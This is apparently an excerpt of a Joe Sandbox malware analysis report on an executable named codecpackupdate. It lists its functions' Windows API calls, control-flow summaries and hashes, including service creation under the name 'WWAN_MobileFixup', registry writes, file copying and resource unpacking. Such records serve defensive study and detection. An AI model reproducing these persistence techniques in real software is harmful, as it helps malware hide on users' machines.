                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                          • Instruction ID: bdc1dc1f8be9f1a85e4812a31df9c453441b6f572615afd11c7cbbe7009e603d
                                                                          • Opcode Fuzzy Hash: 401029335cdd060f4c3739ebb86f5453ce87962896cee6a98a7773047d595e2a
                                                                          • Instruction Fuzzy Hash: 08F0E5319043015AEF245F306E463263EA8DB50397F1184BFF401F82D1EB78C790950A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B40C Relevance: 3.0, APIs: 2, Instructions: 12registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 126 40b40c-40b4d9 RegQueryValueExA 128 40b92e 126->128 129 40b822-40b82b RegCloseKey 128->129 130 40b934-40ba4e 128->130 129->128 133 40ba54 130->133
                                                                          APIs
                                                                          • RegQueryValueExA.KERNELBASE ref: 0040B4D1
                                                                          • RegCloseKey.KERNELBASE(?), ref: 0040B825
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CloseQueryValue
                                                                          • String ID:
                                                                          • API String ID: 3356406503-0
                                                                          • Opcode ID: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                          • Instruction ID: a3e4645529f843f61550e48a598415364148f40a2ce15bb9cbadf78dc0097e25
                                                                          • Opcode Fuzzy Hash: 134ce427d92d70c0111e1806a8c5cfdfd9407f9f49210c1a287f1998412d3728
                                                                          • Instruction Fuzzy Hash: A4D0C931948106EAC7009FB08F0D5397EA9FA083417218577A603B00E0D7BD46126A9E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B4FC Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 134 40b4fc-40b50e 135 40b510-40b528 134->135 136 40b4d3-40b4e6 CreateDirectoryA 134->136 138 40b52a-40b535 135->138 139 40b59d-40b5b5 135->139 141 40b58b 138->141 140 40b5b7-40b5b9 139->140 139->141 141->139
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                          • Instruction ID: ebd2c6e02f9d43b3d40f01d17a74bd438e6d2ac48b0db6d6420a9778e4eaa713
                                                                          • Opcode Fuzzy Hash: fcd0fb28436346cebec9de2a814f493663ffb4acfc5454b8ba783580e8604382
                                                                          • Instruction Fuzzy Hash: 4BF0A26345C29CAFC321D5B83C448E23F74F5931507554EA7D151AF087D2198953C3CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004028FD Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 142 4028fd-40b3c8 RegOpenKeyExA 144 40b934-40b936 142->144 145 40ba4e 142->145 144->145 145->144 146 40ba54 145->146
                                                                          APIs
                                                                          • RegOpenKeyExA.KERNELBASE(80000002), ref: 0040B3C0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Open
                                                                          • String ID:
                                                                          • API String ID: 71445658-0
                                                                          • Opcode ID: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                          • Instruction ID: 909e799b75931c5b62772d4b2f3710706e3fc10ef07775b3481c305365d9140b
                                                                          • Opcode Fuzzy Hash: 8340735e36433d2e621e99962aac8dbece34f8ed7b0fbf864752116af6356328
                                                                          • Instruction Fuzzy Hash: 72C04C60608146EAE6089AB189096762768EB44740F3149378913F16D0D339DA1665AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B3EA Relevance: 1.5, APIs: 1, Instructions: 10registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 148 40b3ea-40ba04 RegSetValueExA
                                                                          APIs
                                                                          • RegSetValueExA.KERNELBASE(?), ref: 0040B9FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID:
                                                                          • API String ID: 3702945584-0
                                                                          • Opcode ID: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                          • Instruction ID: 4d13c9e98189893827979a362c4bd14f52071052fe37cb831e46076aa9f9f1e9
                                                                          • Opcode Fuzzy Hash: 5317ccae25348d6653a0bc53609ee191fbdf3e00c6017a1cf178d5707409b4b6
                                                                          • Instruction Fuzzy Hash: 9FC08CB1804409FACB061BD09C08A3C7E3AE708788F200462E10330CA0C33E0BB2BB6E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B397 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 151 40b397-40ba76 CopyFileA 154 402760-402761 151->154 155 40ba7c 151->155 157 40ba7e 155->157 157->157
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID:
                                                                          • API String ID: 1304948518-0
                                                                          • Opcode ID: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                          • Instruction ID: 4b668b5fb2a19e430f9510732bbbf35e32ddcc61e88bebebdf2395f5775374df
                                                                          • Opcode Fuzzy Hash: 7d38dac9929fb4991dc41ff22106602b2e1087a9a39ff8f9de006141421cb0d1
                                                                          • Instruction Fuzzy Hash: AAB012B4384214A6E5006A300F8DF37121DDB007C1F1400333507F60E0C6FCC981657E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B4DE Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 162 40b4de-40b4e6 CreateDirectoryA
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE ref: 0040B4E0
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateDirectory
                                                                          • String ID:
                                                                          • API String ID: 4241100979-0
                                                                          • Opcode ID: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                          • Instruction ID: d70fb2d4326590eea8b65127b1b419e7c4e084d95afc867c60e11a96707e2c92
                                                                          • Opcode Fuzzy Hash: c151bc14e0bb91fbb8e7eca4dafd0b7c5a4a5b715ebfa07865c3b19ad9e5cb26
                                                                          • Instruction Fuzzy Hash: 64A0223008A020EAE00023000EA8C2B3C3CF8003C23208033B303B00C0833E080302BF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004028DB Relevance: 1.5, APIs: 1, Instructions: 4registryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 163 4028db-4028e1 RegCloseKey 164 40286b 163->164 164->163
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID:
                                                                          • API String ID: 3535843008-0
                                                                          • Opcode ID: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                          • Instruction ID: 76804de5ad9cf923849592551e73c5d136ae12485515376d4ea460b458854c4b
                                                                          • Opcode Fuzzy Hash: 990c3c1dea4594085966e104cf6a03199e71a4503b704534c7eb79dcaa3d89bf
                                                                          • Instruction Fuzzy Hash: 5DA01230C04409C7C20497A0C30C4283AB459043043114072C113B00D0C37C5502550A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004028A6 Relevance: 1.5, APIs: 1, Instructions: 3registryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegCreateKeyExA.KERNELBASE ref: 004028A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                          • Instruction ID: 94413375a01e53b797accf35fc7fe945d277f428ce3223a44cf6c20e190ec76b
                                                                          • Opcode Fuzzy Hash: c119085e98968012a478d05f9da36ab8ada70fc996d553aa7d263a9e4816e65c
                                                                          • Instruction Fuzzy Hash: 31900230344101EAE2104B315B0C21A2598550464571104355B0BE4190D6748511551D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B323 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ManagerOpen
                                                                          • String ID:
                                                                          • API String ID: 1889721586-0
                                                                          • Opcode ID: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                          • Instruction ID: 893d3e26ed5c51661bf8be8d29d2bb54a563af28b692fefe241a45f5ad98b385
                                                                          • Opcode Fuzzy Hash: dfaf3f851df420e3e7b0c4056ca2fcc5e50da974e7909aa90e6769422c755a01
                                                                          • Instruction Fuzzy Hash: D29002201540019FC2504F105FAD01825D251403063710435E203F40E0D6744455A92E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040226E Relevance: 1.3, APIs: 1, Instructions: 38stringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 1586166983-0
                                                                          • Opcode ID: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction ID: b9dd472658aa79e8713cc1c43643f3a09ee23d5b7ec078f99577b19effab2280
                                                                          • Opcode Fuzzy Hash: e02f8efbac426ba64e9b08b55a62167551dd3e5192ad7b41aa824c6377f46e98
                                                                          • Instruction Fuzzy Hash: 54F09A3260C2538EC74216656A082B67BA0AA51710B38847B9C87B51D2DBBC485376AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 00402572 Relevance: 1.5, APIs: 1, Instructions: 11serviceCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CreateService
                                                                          • String ID:
                                                                          • API String ID: 1592570254-0
                                                                          • Opcode ID: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                          • Instruction ID: e828ca7ff849c5aa2293def9fffda87c5c0e13961c3d7613c3eafe11c79639c0
                                                                          • Opcode Fuzzy Hash: 20bb668e72a770e7973f593bb331a6a58a03ea000dbdcb0468e7c3fb687a14c6
                                                                          • Instruction Fuzzy Hash: C7C04C30888105EBCB644F40AD58D2B3A79D680315B714876E507B69D0D33D6D56BAFF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004023B3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 75registrysynchronizationthreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(WWAN_MobileFixup 2.33.197.66,Function_0000235E), ref: 004023C1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402420
                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 00402480
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                          • SetServiceStatus.ADVAPI32(0040A110), ref: 004024CA
                                                                          Strings
                                                                          • WWAN_MobileFixup 2.33.197.66, xrefs: 004023BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: WWAN_MobileFixup 2.33.197.66
                                                                          • API String ID: 3346042915-2719033208
                                                                          • Opcode ID: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction ID: 16ab96e2cb68f3bca67a8d02827ccf702012fa4ba7b91bfe8048b6e668af4302
                                                                          • Opcode Fuzzy Hash: 221372e02594791a34832dfa3998b7de0c824a95239fe2b27a61cd26514d68eb
                                                                          • Instruction Fuzzy Hash: A621ECB0841310ABC2109F16EF4D9167EB8EBCA758F11413AE105BA2B2C7B94575CFAE
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                          • API String ID: 2238633743-4044615076
                                                                          • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                          • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 352835431-0
                                                                          • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                          • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                          • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                          • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1823725401-0
                                                                          • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                          • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401F64 Relevance: 12.1, APIs: 8, Instructions: 121memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(?,0000000A), ref: 00401F7A
                                                                          • GetLastError.KERNEL32 ref: 00401F86
                                                                          • SizeofResource.KERNEL32(00000000), ref: 00401F93
                                                                          • LoadResource.KERNEL32(00000000), ref: 00401FAD
                                                                          • LockResource.KERNEL32(00000000), ref: 00401FB4
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401FBF
                                                                          • GetTickCount.KERNEL32 ref: 00401FFB
                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00402061
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction ID: cd0a89f7906a11fa59f7c630caffefac6273cd55dd9fd3e2fc017d6917677aa9
                                                                          • Opcode Fuzzy Hash: d2a57f7cc8f0d0fe454428983335f0199e5147479bb7e2a898d268b80a50adbf
                                                                          • Instruction Fuzzy Hash: DB312971A40251AFDB109FB99E489AF7B78EF49344B10807AFA46F7281D6748941C7A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3852931651-0
                                                                          • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
